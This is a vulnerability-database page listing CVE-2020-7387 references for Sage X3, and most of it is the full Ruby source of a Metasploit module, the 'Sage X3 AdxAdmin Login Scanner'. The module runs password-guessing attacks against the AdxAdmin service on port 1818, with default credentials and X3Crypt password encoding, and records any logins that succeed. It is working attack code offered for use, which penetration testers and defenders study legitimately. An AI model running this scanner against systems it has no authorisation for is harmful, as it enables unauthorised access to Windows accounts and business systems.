| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| Sage X3 Administration Service Authentication Bypass / Command Execution Exploit | 21 Jul 202100:00 | – | zdt | |
| CVE-2020-7388 | 7 Jul 202100:00 | – | attackerkb | |
| Last Week’s Security news: PrintNightmare patches and Metasploit, Kaseya CVEs, Morgan Stanley Accellion FTA, Cisco BPA and WSA, Philips Vue PACS, CISA RVAs, Lazarus job offers | 11 Jul 202120:52 | – | avleonov | |
| CVE-2020-7387 | 9 Jul 202102:21 | – | circl | |
| Sage Group Sage X3 信息泄露漏洞 | 21 Jul 202100:00 | – | cnnvd | |
| CVE-2020-7387 | 22 Jul 202118:27 | – | cve | |
| CVE-2020-7387 Sage X3 AdxAdmin Exposure of Sensitive Information to an Unauthorized Actor | 22 Jul 202118:27 | – | cvelist | |
| Sage X3 AdxAdmin Login Scanner | 21 Jul 202117:42 | – | metasploit | |
| Sage X3 Administration Service Authentication Bypass Command Execution | 21 Jul 202117:42 | – | metasploit | |
| CVE-2020-7387 | 22 Jul 202119:15 | – | nvd |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/x3'
require 'metasploit/framework/credential_collection'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Exploit::Remote::Tcp
def initialize(_info = {})
super(
'Name' => 'Sage X3 AdxAdmin Login Scanner',
'Description' => %q{
This module allows an attacker to perform a password guessing attack against
the Sage X3 AdxAdmin service, which in turn can be used to authenticate to
a local Windows account.
This module implements the X3Crypt function to 'encrypt' any passwords to
be used during the authentication process, given a plaintext password.
},
'Author' => ['Jonathan Peterson <deadjakk[at]shell.rip>'], # @deadjakk
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']
]
)
register_options(
[
Opt::RPORT(1818),
OptString.new('USERNAME', [false, 'User with which to authenticate to the AdxAdmin service', 'x3admin']),
OptString.new('PASSWORD', [false, 'Plaintext password with which to authenticate', 's@ge2020'])
]
)
deregister_options('BLANK_PASSWORDS')
end
def run_host(ip)
cred_collection = build_credential_collection(
blank_passwords: false,
password: datastore['PASSWORD'],
username: datastore['USERNAME']
)
scanner = Metasploit::Framework::LoginScanner::X3.new(
configure_login_scanner(
host: ip,
port: rport,
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
max_send_size: datastore['TCP::max_send_size'],
send_delay: datastore['TCP::send_delay'],
framework: framework,
framework_module: self,
local_port: datastore['CPORT'],
local_host: datastore['CHOST']
)
)
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
module_fullname: fullname,
workspace_id: myworkspace_id
)
case result.status
when Metasploit::Model::Login::Status::SUCCESSFUL
print_brute(level: :good, ip: ip, msg: "Success: '#{result.credential}'")
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
next
when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
vprint_brute(level: :verror, ip: ip, msg: "Could not connect: #{result.proof}")
when Metasploit::Model::Login::Status::INCORRECT
vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{result.credential}'")
end
invalidate_login(credential_data)
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation